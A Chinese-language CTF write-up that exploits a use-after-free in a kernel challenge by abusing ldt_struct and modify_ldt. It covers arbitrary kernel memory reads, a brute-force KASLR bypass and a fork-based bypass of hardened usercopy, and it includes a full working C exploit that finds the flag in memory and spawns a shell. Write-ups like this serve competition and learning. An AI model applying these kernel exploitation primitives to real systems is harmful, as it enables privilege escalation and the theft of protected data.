在內存中直接搜索 flag¶
Initial RAM disk(initrd)提供了在 boot loader 階段載入一個 RAM disk 並掛載爲根文件系統的能力,從而在該階段運行一些用戶態程序,在完成該階段工作之後纔是掛載真正的根文件系統。
initrd 文件系統鏡像通常爲 gzip 格式,在啓動階段由 boot loader 將其路徑傳給 kernel,自 2.6 版本後出現了使用 cpio 格式的initramfs,從而無需掛載便能展開爲一個文件系統。
initrd/initramfs 的特點便是文件系統中的所有內容都會被讀取到內存當中,而大部分 CTF 中的 kernel pwn 題目都選擇直接將 initrd 作爲根文件系統,因此若是我們有着內存搜索能力,我們便能直接在內存空間中搜索 flag 的內容 :)
例題:RWCTF2023體驗賽 - Digging into kernel 3¶
題目分析¶
題目已經在前面分析過了,這裏筆者就不重複分析了 :)
漏洞利用:ldt_struct 直接讀取 initramfs 內容¶
既然題目中已經直接白給出了一個無限制的 UAF,那麼利用方式就是多種多樣的了 :-D 這裏筆者選擇利用 ldt_struct 直接在內存空間中搜索 flag 的方式解題。
Step.I - 利用 ldt_struct 進行任意內存讀取¶
ldt 即局部段描述符表(Local Descriptor Table),其中存放着進程的段描述符,段寄存器當中存放着的段選擇子便是段描述符表中段描述符的索引,在內核中與 ldt 相關聯的結構體爲 ldt_struct ,該結構體定義如下, entries 指針指向一塊描述符表的內存,nr_entries 表示 LDT 中的描述符數量:
struct ldt_struct {
/*
* Xen requires page-aligned LDTs with special permissions. This is
* needed to prevent us from installing evil descriptors such as
* call gates. On native, we could merge the ldt_struct and LDT
* allocations, but it's not worth trying to optimize.
*/
struct desc_struct *entries;
unsigned int nr_entries;
/*
* If PTI is in use, then the entries array is not mapped while we're
* in user mode. The whole array will be aliased at the addressed
* given by ldt_slot_va(slot). We use two slots so that we can allocate
* and map, and enable a new LDT without invalidating the mapping
* of an older, still-in-use LDT.
*
* slot will be -1 if this LDT doesn't have an alias mapping.
*/
int slot;
};
我們主要關注該結構體如何用作漏洞利用,Linux 提供了一個 modify_ldt() 系統調用操縱當前進程的 ldt_struct 結構體:
SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
unsigned long , bytecount)
{
int ret = -ENOSYS;
switch (func) {
case 0:
ret = read_ldt(ptr, bytecount);
break;
case 1:
ret = write_ldt(ptr, bytecount, 1);
break;
case 2:
ret = read_default_ldt(ptr, bytecount);
break;
case 0x11:
ret = write_ldt(ptr, bytecount, 0);
break;
}
/*
* The SYSCALL_DEFINE() macros give us an 'unsigned long'
* return type, but tht ABI for sys_modify_ldt() expects
* 'int'. This cast gives us an int-sized value in %rax
* for the return code. The 'unsigned' is necessary so
* the compiler does not try to sign-extend the negative
* return codes into the high half of the register when
* taking the value from int->long.
*/
return (unsigned int)ret;
}
對於 write_ldt() 而言其最終會調用 alloc_ldt_struct() 分配 ldt 結構體,由於走的是通用的分配路徑所以我們可以在該結構體上完成 UAF :)
/* The caller must call finalize_ldt_struct on the result. LDT starts zeroed. */
static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
struct ldt_struct *new_ldt;
unsigned int alloc_size;
if (num_entries > LDT_ENTRIES)
return NULL;
new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
//...
而 read_ldt() 就是簡單的讀出 LDT 表上內容到用戶空間,由於我們有無限制的 UAF,故可以修改 ldt->entries 完成內核空間中的任意地址讀:
static int read_ldt(void __user *ptr, unsigned long bytecount)
{
//...
if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
retval = -EFAULT;
goto out_unlock;
}
//...
out_unlock:
up_read(&mm->context.ldt_usr_sem);
return retval;
}
read_ldt() 還能幫助我們繞過 KASLR ,這裏我們要用到 copy_to_user() 的一個特性:對於非法地址,其並不會造成 kernel panic,只會返回一個非零的錯誤碼,我們不難想到的是,我們可以多次修改 ldt->entries 並多次調用 modify_ldt() 以爆破內核的 page_offset_base,若是成功命中,則 modify_ldt 會返回給我們一個非負值。
不過由於 hardened usercopy 的存在,我們並不能夠直接讀取內核代碼段或是線性映射區中大小不符的對象的內容,否則會造成 kernel panic。
Step.II - 利用 fork 繞過 hardened usercopy¶
雖然在用戶空間與內核空間之間的數據拷貝存在 hardened usercopy,但是在內核空間到內核空間的數據拷貝間並不存在類似的保護機制,因此我們可以通過一些手段繞過 hardended usercopy。
閱讀 Linux 內核源碼,我們不難觀察到當進程調用 fork() 時,內核會通過 memcpy() 將父進程的 ldt->entries 上的內容拷貝給子進程:
/*
* Called on fork from arch_dup_mmap(). Just copy the current LDT state,
* the new task is not running, so nothing can be installed.
*/
int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
//...
memcpy(new_ldt->entries, old_mm->context.ldt->entries,
new_ldt->nr_entries * LDT_ENTRY_SIZE);
//...
}
該操作是完全處在內核中的操作,因此不會觸發 hardened usercopy 的檢查,我們只需要在父進程中設定好搜索的地址之後再開子進程來用 read_ldt() 讀取數據即可。
EXPLOIT¶
最後的 exp 如下,這也是筆者在比賽時所用的解法:
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <stdio.h>
#include <signal.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <ctype.h>
#include <stdint.h>
int dev_fd;
struct node {
uint32_t idx;
uint32_t size;
void *buf;
};
void err_exit(char * msg)
{
printf("[x] %s \n", msg);
exit(EXIT_FAILURE);
}
void alloc(uint32_t idx, uint32_t size, void *buf)
{
struct node n = {
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0xDEADBEEF, &n);
}
void del(uint32_t idx)
{
struct node n = {
.idx = idx,
};
ioctl(dev_fd, 0xC0DECAFE, &n);
}
int main(int argc, char **argv, char **envp)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t secondary_startup_64;
uint64_t kernel_base = 0xffffffff81000000, kernel_offset;
uint64_t search_addr, flag_addr = -1;
uint64_t temp;
uint64_t ldt_buf[0x10];
char *buf;
char flag[0x100];
int pipe_fd[2];
int retval;
cpu_set_t cpu_set;
/* bind to CPU core 0 */
CPU_ZERO(&cpu_set);
CPU_SET(0, &cpu_set);
sched_setaffinity(0, sizeof(cpu_set), &cpu_set);
dev_fd = open("/dev/rwctf", O_RDONLY);
if (dev_fd < 0) {
err_exit("FAILED to open the /dev/rwctf file!");
}
/* init descriptor info */
desc.base_addr = 0xff0000;
desc.entry_number = 0x8000 / 8;
desc.limit = 0;
desc.seg_32bit = 0;
desc.contents = 0;
desc.limit_in_pages = 0;
desc.lm = 0;
desc.read_exec_only = 0;
desc.seg_not_present = 0;
desc.useable = 0;
alloc(0, 16, "arttnba3rat3bant");
del(0);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_buf[0] = page_offset_base;
ldt_buf[1] = 0x8000 / 8;
del(0);
alloc(0, 16, ldt_buf);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
printf("[-] read data: 0x%lx\n", temp);
break;
}
else if (retval == 0) {
err_exit("no mm->context.ldt!");
}
page_offset_base += 0x1000000;
}
printf("[+] Found page_offset_base: 0x%lx\n", page_offset_base);
/* leak kernel base from direct mappinig area by modify_ldt() */
ldt_buf[0] = page_offset_base + 0x9d000;
ldt_buf[1] = 0x8000 / 8;
del(0);
alloc(0, 16, ldt_buf);
syscall(SYS_modify_ldt, 0, &secondary_startup_64, 8);
kernel_offset = secondary_startup_64 - 0xffffffff81000060;
kernel_base += kernel_offset;
printf("[*] Get secondary_startup_64: 0x%lx\n", secondary_startup_64);
printf("[+] kernel_base: 0x%lx\n", kernel_base);
printf("[+] kernel_offset: 0x%lx\n", kernel_offset);
/* search for flag in kernel space */
search_addr = page_offset_base;
pipe(pipe_fd);
buf = (char*) mmap(NULL, 0x8000,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS,
0, 0);
while(1) {
ldt_buf[0] = search_addr;
ldt_buf[1] = 0x8000 / 8;
del(0);
alloc(0, 16, ldt_buf);
int ret = fork();
if (!ret) { // child
char *result_addr;
syscall(SYS_modify_ldt, 0, buf, 0x8000);
result_addr = memmem(buf, 0x8000, "rwctf{", 6);
if (result_addr) {
for (int i = 0; i < 0x100; i++) {
if (result_addr[i] == '}') {
flag_addr = search_addr + (uint64_t)(result_addr - buf);
printf("[+] Found flag at addr: 0x%lx\n", flag_addr);
}
}
}
write(pipe_fd[1], &flag_addr, 8);
exit(0);
}
wait(NULL);
read(pipe_fd[0], &flag_addr, 8);
if (flag_addr != -1) {
break;
}
search_addr += 0x8000;
}
/* read flag */
memset(flag, 0, sizeof(flag));
ldt_buf[0] = flag_addr;
ldt_buf[1] = 0x8000 / 8;
del(0);
alloc(0, 16, ldt_buf);
syscall(SYS_modify_ldt, 0, flag, 0x100);
printf("[+] flag: %s\n", flag);
system("/bin/sh");
return 0;
}